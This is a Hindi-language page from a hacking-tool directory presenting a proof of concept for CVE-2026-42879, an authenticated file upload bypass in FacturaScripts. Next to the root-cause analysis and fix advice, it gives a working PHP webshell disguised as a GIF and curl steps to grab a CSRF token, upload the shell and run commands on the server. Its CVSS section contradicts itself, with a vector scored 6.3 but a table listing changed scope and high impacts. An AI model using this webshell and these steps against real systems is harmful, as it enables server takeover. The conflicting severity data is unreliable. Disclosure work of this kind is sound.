Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/guzrex/cve-2026-42879
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubguzrex/cve-2026-42879

CVE-2026-42879

फैक्टुरास्क्रिप्ट्स RCE एक्सप्लॉइट - प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-42879 - FacturaScripts - प्रमाणित असीमित फ़ाइल अपलोड MIME प्रकार बाईपास के माध्यम से

सारांश

FacturaScripts की उत्पाद छवि अपलोड कार्यक्षमता में एक प्रमाणित असीमित फ़ाइल अपलोड भेद्यता मौजूद है। मान्य क्रेडेंशियल वाला एक हमलावर GIF छवि के रूप में प्रच्छन्न PHP फ़ाइल (GIF89a हेडर का उपयोग करके) अपलोड कर सकता है, जिससे MIME प्रकार सत्यापन को बाईपास किया जा सकता है। फ़ाइल अपने मूल एक्सटेंशन के साथ संग्रहीत की जाती है, जिसमें .php जैसे निष्पादन योग्य एक्सटेंशन शामिल हैं।


विवरण

भेद्यता इसमें मौजूद है:

Core/Lib/ExtendedController/ProductImagesTrait.php

विशेष रूप से addImageAction() विधि में।

भेद्य कोड

root@kitploit:~
if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}

$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());

मूल कारण

  • सत्यापन केवल यह जाँचता है कि MIME प्रकार में "image/" शामिल है या नहीं
  • इसे PHP फ़ाइल में GIF89a मैजिक बाइट्स जोड़कर बाईपास किया जा सकता है
  • सिस्टम गलत तरीके से फ़ाइल को image/gif के रूप में पहचानता है
  • फ़ाइल को वेब-सुलभ निर्देशिका में .php एक्सटेंशन के साथ सहेजा जाता है

फ़ाइल संग्रहण व्यवहार

अपलोड की गई फ़ाइलें इसमें संग्रहीत की जाती हैं:

root@kitploit:~
/MyFiles/YYYY/MM/X.php

जहाँ X एक स्वतः-वृद्धि आईडी है। यह सीधे दूरस्थ निष्पादन की अनुमति देता है:

root@kitploit:~
http://target/MyFiles/2026/03/2.php?cmd=id

प्रभाव

सफल शोषण निम्न की अनुमति देता है:

एक हमलावर सर्वर पर निष्पादन योग्य एक्सटेंशन (जैसे .php) वाली फ़ाइलें अपलोड कर सकता है, जो सर्वर कॉन्फ़िगरेशन के आधार पर आगे के शोषण का कारण बन सकता है।


प्रूफ ऑफ कॉन्सेप्ट (मैनुअल)

चरण 1: दुर्भावनापूर्ण फ़ाइल बनाएँ

root@kitploit:~
cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF

चरण 2: प्रमाणित करें

  • एप्लिकेशन में लॉगिन करें
  • ब्राउज़र कुकीज़ से PHPSESSID निकालें

चरण 3: CSRF टोकन प्राप्त करें

root@kitploit:~
curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  | grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4

चरण 4: शेल अपलोड करें

root@kitploit:~
curl -X POST "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "multireqtoken=YOUR_CSRF_TOKEN" \
  -F "action=add-image" \
  -F "activetab=EditProductoImagen" \
  -F "idproducto=3" \
  -F "newfiles[][email protected]"

चरण 5: कमांड निष्पादित करें

root@kitploit:~
curl "http://target/MyFiles/2026/03/2.php?cmd=id"

CVSS v3.1

वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N आधार स्कोर: 6.3 (मध्यम)

मीट्रिकमान
Attack VectorNetwork (AV:N)
Attack ComplexityLow (AC:L)
Privileges RequiredLow (PR:L)
User InteractionNone (UI:N)
ScopeChanged (S:C)
ConfidentialityHigh (C:H)
IntegrityHigh (I:H)
AvailabilityHigh (A:H)

CWE

  • CWE-434: खतरनाक प्रकार वाली फ़ाइल का असीमित अपलोड

प्रभावित उत्पाद

फ़ील्डमान
EcosystemPackagist
CVE IDCVE-2026-42879
Package Namefacturascripts/facturascripts
Affected Versions<= 2025.81
Patched VersionsNot yet patched
Fixed inPending

सुधार अनुशंसाएँ

  1. फ़ाइल एक्सटेंशन सत्यापित करें — किसी भी अपलोड को अस्वीकार करें जहाँ फ़ाइलनाम .php, .phtml, .phar, या अन्य निष्पादन योग्य एक्सटेंशन में समाप्त होता है, चाहे MIME प्रकार कुछ भी हो
  2. सर्वर पर फ़ाइलनाम पुनः उत्पन्न करें — getClientOriginalName() का कभी उपयोग न करें; सत्यापित एक्सटेंशन के साथ एक सुरक्षित UUID-आधारित नाम निर्दिष्ट करें
  3. अपलोड को वेबरूट के बाहर संग्रहीत करें — फ़ाइलों को एक कंट्रोलर के माध्यम से परोसें जो सामग्री को स्ट्रीम करता है, सीधे URL निष्पादन को रोकता है
  4. फ़ाइल प्रकार लाइब्रेरी का उपयोग करें — क्लाइंट-आपूर्ति MIME पर भरोसा करने के बजाय fileinfo जैसी लाइब्रेरी के साथ वास्तविक फ़ाइल सामग्री (मैजिक बाइट्स + एक्सटेंशन + MIME प्रकार) सत्यापित करें

क्रेडिट

  • खोजकर्ता: Abdullah Alwasabei / Guzrex
टूल डाउनलोड करें